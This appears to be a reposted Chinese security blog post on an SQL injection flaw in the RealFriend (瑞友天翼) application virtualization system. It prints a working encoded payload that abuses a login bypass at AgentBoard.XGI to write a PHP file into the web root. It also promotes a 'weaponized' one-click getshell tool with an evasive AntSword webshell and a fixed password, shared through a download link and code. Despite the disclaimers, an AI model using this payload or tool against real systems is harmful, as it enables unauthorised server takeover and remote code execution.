工具开发
声明
-
文章仅用于基础信息防御交流,请勿用于其他用途!请勿利用文章中的相关技术进行非法测试!
-
原创不易,未经授权请勿转载,文章转载请标明出处。
漏洞简介
瑞友天翼应用虚拟化系统由于对用户传入的数据安全处理不当,导致存在 SQL 注入漏洞,远程且未经过授权认证的攻击者可利用此漏洞获取数据库里敏感信息,也可进一步写入 webshell 后门访问,攻击者从而可在目标服务器上执行任意恶意代码,获取系统权限。
影响范围
5.x<=version<=7.0.2.1
简单分析
根据Xray新增的漏洞探测Poc和网上打码发出的图片进行漏洞位置猜测。搭建环境进行简单的源码查看。在AgentBoard.php文件中可以看到漏洞位置,直接接收一个user参数。
访问/AgentBoard.XGI查看页面。
当cmd参数为UserLogin时,可绕过验证。
单引号闭合SQL语句,构造传参。
Select user_id,f_id from CUser where name=''1&cmd=UserLogin
into outfile写入文件。提前是安装为默认路径:
C:\Program Files (x86)\RealFriend\Rap Server\WebRoot\
写入phpinfo Poc:
/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5CAppListwe.XGI%5C%5phpinfo.php%22+--+-&cmd=UserLogin
检测工具
正所谓No Exp Say jb!使用javaFx实现图形化脚本。
1、通过ConsoleExternalUploadApi接口和AgentBoard.XGI接口进行检测
2、测试POC参考Xray探测包
3、上传WbeShell使用了一定的免杀技术,只支持蚁剑,连接密码为realor
漏洞检测:
一键Getshell:
蚁剑测试:
工具获取:
声明:本工具仅用于系统安全评估,请勿用于其他非法测试!
https://cowtransfer.com/s/93c2c94978c146
口令:w9jeq7
加群交流
考虑到上传的工具可能被和谐,或者存在Bug方便大家提需求,交流学习可以加一下群,后续编写的图形化Exp工具也会同步分享到群里。二维码过期请联系公众号加群。
社
区
群
原文始发于微信公众号(信安驿站):瑞友天翼应用虚拟化系统SQL注入漏洞从浅析到武器化
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论